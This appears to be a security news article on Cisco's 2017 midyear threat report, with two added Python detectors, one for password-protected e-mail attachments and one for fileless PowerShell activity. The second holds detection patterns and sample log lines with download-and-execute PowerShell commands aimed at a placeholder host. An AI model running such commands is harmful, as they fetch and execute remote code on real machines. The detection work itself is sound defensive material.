Defenders Gaining on Attackers, But Attacks Becoming More Destructive: Cisco

Cisco Publishes 2017 Midyear Cybersecurity Report

Cisco's just-released Midyear Cybersecurity Report (PDF) draws on the accumulated work of the Cisco Security Research members. The result shows some improvement in industry's security posture, but warns about the accelerating pace of change and sophistication in the global cyber threat landscape.

Improvements can be demonstrated by the mean 'time to detect.' When monitoring first began in November 2015, this stood at 39 hours; but it narrowed to about 3.5 hours in the period from November 2016 to May 2017.

Against this, however, Cisco warns that the pace of technology is creating an ever-increasing threat surface that needs to be protected. "Lack of visibility into dynamic IT environments," notes the report, "the risks presented by 'shadow IT,' the constant barrage of security alerts, and the complexity of the IT security environment are just some reasons resource-strapped security teams struggle to stay on top of today's evasive and increasingly potent cyber threats."

The report analyzes existing threats, comments on evolving attack methodologies, and makes two worrying predictions about the increasing ruthlessness of attackers. The first prediction is that any apparent current lull in the use of IoT-based large-scale DDoS is no reason for optimism. "Botnet activity in the IoT space suggests some operators may be focused on laying the foundation for a wide-reaching, high-impact attack that could potentially disrupt the Internet itself," says Cisco.

Cisco's second concern is the potential evolution of ransomware into a threat designed to lock down systems and destroy data as part of the attack process. It calls this threat Destruction of Service (DeOS), and we may already have seen its nascence in NotPetya.

In financial value to the attacker, Cisco points out that ransomware is far less fruitful than the business email compromise (BEC) attack. "US$5.3 billion was stolen due to BEC fraud between October 2013 and December 2016. In comparison, ransomware exploits took in US$1 billion in 2016," says the report. 

"BEC scams are aimed at big targets," it explains, "and big targets have fallen victim to them, even though such organizations may have mature threat defenses and safeguards against fraud. Both Facebook and Google have been victims of BECs and wire fraud." The attack's success rate is easily explained. "Because BEC messages don't contain malware or suspect links, they can usually bypass all but the most sophisticated threat defense tools."

Cisco highlights five current trends in malware evolution that have been evident in the first six months of 2017. The first is that attackers are using distribution systems that require users to take some type of positive action. An example would be a password-protected malicious document (with the password conveniently provided to the user in the body of the email). "When placed in a sandbox environment," says Cisco, "these attachments do not show any evidence of being malicious, so they are forwarded to the user."
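Because the sandbox cannot open the attachment, the detectable signal is the pairing itself: an encrypted archive arriving with its password in the message body. The following is an added example, not code from Cisco's report or from any product it describes. It parses a raw e-mail, checks each ZIP attachment for the encryption flag, looks for a password handed over in the body, and flags the combination. The regex, the `example.invalid` addresses and the sample archive are constructed assumptions for this example.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Heuristic for the delivery pattern described above: an encrypted archive
# attached to a mail whose body hands the recipient the password. The archive
# cannot be inspected automatically, so the combination itself is the signal.
# The pattern below is an assumption for this example, not a vendor rule.
PASSWORD_HINT = re.compile(r"\bpassword\b[^\n]{0,40}?[:\s]+(\S{4,})", re.IGNORECASE)


def zip_has_encrypted_member(data: bytes) -> bool:
    """True if any ZIP member sets general-purpose flag bit 0 (encrypted)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(info.flag_bits & 0x1 for info in zf.infolist())
    except zipfile.BadZipFile:
        return False


def analyze_message(raw: bytes) -> dict:
    """Flag a message that pairs an encrypted ZIP with a password in the body."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain", "html"))
    body_text = body.get_content() if body is not None else ""
    password_in_body = PASSWORD_HINT.search(body_text) is not None

    encrypted_attachments = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        if zip_has_encrypted_member(payload):
            encrypted_attachments.append(part.get_filename() or "<unnamed>")

    return {
        "password_in_body": password_in_body,
        "encrypted_attachments": encrypted_attachments,
        "suspicious": password_in_body and bool(encrypted_attachments),
    }


def make_zip(encrypted: bool) -> bytes:
    """Constructed sample archive holding a harmless placeholder file.

    Python's zipfile cannot write encrypted archives, so for the encrypted case
    the flag bit is set by patching the local and central directory headers.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.docm", b"placeholder content, not a real document")
    data = bytearray(buf.getvalue())
    if encrypted:
        local = data.find(b"PK\x03\x04")      # local file header: flags at +6
        central = data.find(b"PK\x01\x02")    # central directory header: flags at +8
        data[local + 6:local + 8] = b"\x01\x00"
        data[central + 8:central + 10] = b"\x01\x00"
    return bytes(data)


def build_sample(encrypted: bool = True, mention_password: bool = True) -> bytes:
    """Constructed sample e-mail; example.invalid addresses are placeholders."""
    msg = EmailMessage()
    msg["From"] = "accounts@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Invoice 2017-06"
    text = "Please find the attached invoice."
    if mention_password:
        text += " The archive password is: Inv2017"
    msg.set_content(text)
    msg.add_attachment(make_zip(encrypted), maintype="application",
                       subtype="zip", filename="invoice.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    print(analyze_message(build_sample()))
    print(analyze_message(build_sample(encrypted=False, mention_password=False)))
```

A mail gateway that applies this check can quarantine or hold for review the messages a sandbox would otherwise pass through unchanged; the same idea extends to password-protected Office documents, whose encryption is visible from the container format before any content is decrypted.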

The second trend is that ransomware authors are creating malware quickly, easily, and cost-effectively by using open-source codebases, like Hidden Tear and EDA2, which publicly release ransomware code for "educational" purposes.

The third is the continuing growth of ransomware-as-a-service (RaaS) platforms, such as Satan. These, says the report, "are ideal for lazy adversaries who want to enter the ransomware market and launch a successful campaign without having to perform any coding or programming."

"Ransomware as a service," comments David Kennerley, director of threat research at Webroot, "is without a doubt one of the biggest threats facing organizations across industries today, and protection against ransomware is currently a question of economics. Due to poor security practices and culture in many cases it is often seen to be cheaper to pay the ransom to get the data back than to use internal recovery procedures."

But he does not recommend this approach. "No matter how tempting it might be, if any other option exists, however challenging, companies should never negotiate or concede to the criminal and pay the ransom. The danger with paying the ransom is there's no guarantee they'll recover the encrypted files. By paying you are only fueling the ransomware economy – and what now stops you being targeted again in future cyberattacks?"

Cisco's fourth malware trend is the growing prevalence of fileless or memory-resident malware. "It relies on PowerShell or WMI to run the malware completely in memory without writing any artifacts to the file system or registry, unless the attacker wants to put persistent mechanisms in place." Because there is no malware on the disk, there is no file to detect.
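With nothing written to disk, the evidence for this kind of activity lives in PowerShell's own logging rather than in file scans. The following is an added example, not code from Cisco's report: it runs a small set of assumed indicator patterns over constructed records shaped like Event ID 4104 script block log entries, decoding any `-EncodedCommand` argument first so that indicators wrapped in base64 still fire. The record layout, the indicator list and the two-indicator alert threshold are assumptions for this example, and the `example.invalid` hosts are placeholders.

```python
import base64
import re

# Indicator patterns for script blocks that execute payloads in memory, pull
# them over the network, or spawn processes through WMI. These patterns are
# assumptions for this example, not rules from the report.
INDICATORS = {
    "in_memory_execution": re.compile(r"\b(Invoke-Expression|IEX)\b", re.I),
    "remote_download": re.compile(
        r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load", re.I),
    "wmi_process_create": re.compile(r"Win32_Process.*?\bCreate\b", re.I | re.S),
    "stealth_flags": re.compile(
        r"-(?:noprofile|nop|noni|w(?:indowstyle)?\s+hidden)\b", re.I),
}
# -EncodedCommand carries a base64 blob of UTF-16LE PowerShell source.
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_commands(text: str) -> list:
    """Decode every -EncodedCommand argument found in a script block."""
    decoded = []
    for m in ENCODED.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(1)).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue  # malformed blob: ignore rather than crash the pipeline
    return decoded


def analyze_script_block(script: str) -> set:
    """Return the indicator names that fire on a script block and its decoded payloads."""
    hits = set()
    if ENCODED.search(script):
        hits.add("encoded_command")
    for text in [script] + decode_encoded_commands(script):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    return hits


def triage(events: list) -> list:
    """Return (index, sorted hits) for 4104 records with two or more indicators."""
    alerts = []
    for i, ev in enumerate(events):
        if ev.get("id") != 4104:
            continue
        hits = analyze_script_block(ev.get("script", ""))
        if len(hits) >= 2:
            alerts.append((i, sorted(hits)))
    return alerts


def encode_command(source: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(source.encode("utf-16le")).decode("ascii")


# Constructed sample records shaped like Event ID 4104 script block logs.
# Not real telemetry; example.invalid hosts are placeholders.
STAGED_SOURCE = ('Invoke-Expression (New-Object Net.WebClient)'
                 '.DownloadString("http://example.invalid/stage")')
SAMPLE_EVENTS = [
    {"id": 4104, "script": "Get-ChildItem C:\\Users | Measure-Object"},
    {"id": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"},
    {"id": 4104, "script": "powershell -nop -w hidden -EncodedCommand " + encode_command(STAGED_SOURCE)},
    {"id": 4104, "script": "Invoke-WmiMethod -Class Win32_Process -Name Create "
                           "-ArgumentList 'powershell -w hidden -c Get-Date'"},
    {"id": 4103, "script": "IEX 'ignored: not a script block record'"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, hits)
```

The decode step matters more than any single pattern: without it, the third record would show only the stealth flags and the presence of an encoded argument, and the download-and-execute behaviour inside it would stay invisible. Script block logging has to be enabled on the endpoints for these records to exist at all.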

The fifth trend is that attackers are relying more on anonymized and decentralized infrastructures to obfuscate their command and control. Tor bridging services such as Tor2web are one example: Tor2web is a proxying service that allows systems on the Internet to reach content hosted within Tor without requiring a local Tor client application.

In most of these developments, there is a constant: the economics of hacking has turned a corner. "The modern hacking community," says the report, "is benefiting from quick and easy access to a range of useful and low-cost resources."

Cisco notes that a decline in the use of exploit kits to deliver malware has coincided with an increase in spam levels. "Adversaries who had relied heavily on exploit kits to deliver ransomware," it explains, "are turning to spam emails, including those containing macro-laden malicious documents that can defeat many sandboxing technologies because they require user interaction to infect systems and deliver payloads."

Cisco does not expect exploit kits to disappear, but "other factors, such as the greater difficulty of exploiting vulnerabilities in files built with Adobe Flash technology, may be slowing the resurgence."

One threat vector given special mention is PUP-style spyware, which is often given little attention by defenders. Cisco studied three common families, and found at least one present within 20% of 300 companies it sampled. The three families are Hola, RelevantKnowledge, and DNSChanger/DNS Unlocker. "Although operators may market spyware as services designed to protect or otherwise help users," warns the report, "the true purpose of the malware is to track and gather information about users and their organizations -- often without users' direct consent or knowledge. Spyware companies are known to sell or provide access to the data they collect, allowing third parties to harvest information with relative anonymity. That information can be used to identify critical assets, map internal infrastructures in organizations, and orchestrate targeted attacks."

Timely patching continues to be an issue. "In late 2016," says the report, "Cisco threat researchers discovered and reported three remote code-execution vulnerabilities in Memcached servers. A scan of the Internet a few months later revealed that 79 percent of the nearly 110,000 exposed Memcached servers previously identified were still vulnerable to the three vulnerabilities because they had not been patched."

The overall picture presented in Cisco's 2017 Midyear Cybersecurity Report is a mixed bag. There is some good news. "Much of the research," it concludes, "shows that defenders not only have been gaining ground on adversaries, but also developing a much better understanding of how and where threat actors operate."

But against this, it adds, attackers are evolving more destructive attacks (such as DeOS and massive scale IoT-based DDoS attacks). "That is why it has never been more important for organizations to make cybersecurity a top priority."

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.